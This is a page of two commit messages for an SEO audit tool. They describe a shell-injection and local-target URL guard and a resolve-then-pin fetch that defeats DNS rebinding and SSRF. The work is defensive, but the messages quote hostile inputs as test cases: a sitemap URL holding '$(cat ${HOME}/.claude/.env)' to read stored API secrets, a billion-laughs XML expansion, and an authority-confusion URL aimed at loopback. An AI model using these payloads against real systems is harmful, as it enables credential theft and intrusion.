2b25cb4704cbeb0c18a9af70a5a2c428cb92a2b8
2
Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
|
|
b00e8ef442 |
feat(seo-data): safe_fetch — resolve-then-pin, close DNS-rebinding + SSRF
By-principle hardening. H1's url-guard validates the NAME; urlopen then resolved AND connected — two DNS lookups with a window a hostile authority uses to answer PUBLIC to validation and PRIVATE (169.254.169.254 metadata, 127.0.0.1, the LAN) to the connect. A name-level guard cannot see that rebind. safe_fetch collapses the two lookups into one: resolve ONCE, validate every IP (ipaddress, dual-stack v4+v6), refuse if ANY is non-public (the multi-A vector), connect to the exact validated IP with Host+SNI+cert for the real host — no second resolution to poison. Redirects re-validate each hop (urlopen followed them blind). One seam: sitemap._fetch, which linkgraph/render_check/drift all call, so every network verb inherits it. The load-bearing property (confirmed by the security review): classification is on the OS-resolved address (sockaddr[0]), never the URL text — so octal/hex/ decimal literals, IPv4-mapped IPv6, NAT64, 6to4 are all defeated structurally, not by enumeration. Better than the source idea (claude-seo url_safety.py, MIT): dual-stack (theirs IPv4-only), no global monkeypatch so thread-safe by construction (theirs locks a patched getaddrinfo), stdlib-only (no requests). Proven end-to-end before writing: pinned connect keeps SNI+cert for the real host. NOT covered, stated not silent: shell `curl` in the agent specs (separate process, unpinnable here). Smaller surface; `curl --resolve` is a separate change. REVIEW-SURFACED (fresh security-auditor, adversarial, VERDICT PASS) — two real holes it found while attacking the diff, both fixed here: - billion-laughs REOPENED in C1b: _refuse_dtd scanned only raw[:4096], so a >4KB leading comment pushed <!DOCTYPE past the window while ET parsed AND EXPANDED the entities. Proven (&lol2; → "lollollollollol"), now a full-doc case-insensitive scan. This is a genuine fix to already-merged C1b, not this feature — fixed here rather than filed, per root-cause discipline. - 192.88.99.0/24 (6to4-relay anycast) passed is_global as public — added to an extra special-use deny list. Verified: rebind-to-metadata refused BEFORE any connect (injected resolver), multi-A public+private refused, classifier fuzzed dual-stack incl. CGNAT/6to4, non-http scheme refused, both review fixes proven with no false positive; real fetch still works (zenquality 86 loc, lavageangels 24) through the pinned path; all 4 verbs work end-to-end via fetch.sh; seo-data 210 → 221 pass, 0 fail; full suite green; shellcheck + py_compile clean. |
||
|
|
7d6aa09faf |
feat(lib): H1 — url-guard, shell-injection + local-target refusal before curl
Prerequisite for C1, which is why this moved up from AXE 5. Today $DOMAIN is typed by the operator and interpolated into ~10 curls (seo-analyzer.md:254+, geo-analyzer.md:248+) — self-inflicted risk. The sitemap crawl changes the threat model completely: URLs then come from the TARGET'S OWN SERVER, so a remote file's bytes reach a shell. The severe hazard is injection, not SSRF. Those curls quote with ", inside which $ and backtick still execute, and ~/.claude/.env holds GOOGLE_OAUTH_CLIENT_SECRET + CRUX_API_KEY. A <loc> of `https://x/$(cat ${HOME}/.claude/.env)` reads the vault into a request. The test suite asserts exactly that payload is refused. Code, not prose: a markdown instruction does not stop an injection. Mirrors the house pattern (fetch.sh:25 _label_safe) — whole-string allowlist, C locale, POSIX case: newline-proof, locale-independent, no grep pitfall. Allowlist over denylist per CLAUDE.md. Covers: shell metacharacters; scheme (http/https only — no file:, gopher:); literal loopback/private/link-local/metadata/.local; userinfo authority confusion (https://trusted.com@127.0.0.1/ hits .0.0.1, not trusted.com). NOT covered, stated in the header rather than left silent: DNS-level SSRF. A public hostname resolving to a private address passes. Closing it needs resolve-then-pin at the HTTP layer; shell curl cannot without a TOCTOU window. Proportionate to the threat model — this runs on a workstation auditing the operator's own client sites. Wired at all three entry points: both agents' STEP 4 domain assignment, and the W3 sameAs loop (whose URLs come from the audited repo, not the operator). Refused sameAs rows report as REFUSED rather than vanish — neither dead nor live, and an unguardable sameAs is itself a finding. Note: writing the test file tripped the config-protection hook (test suite is a guarded quality-gate). Used the documented one-shot sentinel with a reason rather than working around the gate; it was consumed as designed. Verified: 47 new assertions PASS / 0 FAIL, picked up by make test; full suite green; shellcheck clean on lib/url-guard.sh (the sole remaining hit in the health-stack glob is pre-existing, lib/gitflow-test.sh:242); guard dogfooded against the real zenquality.fr domain (accepted) and the real exfil payload (refused, exit 2). |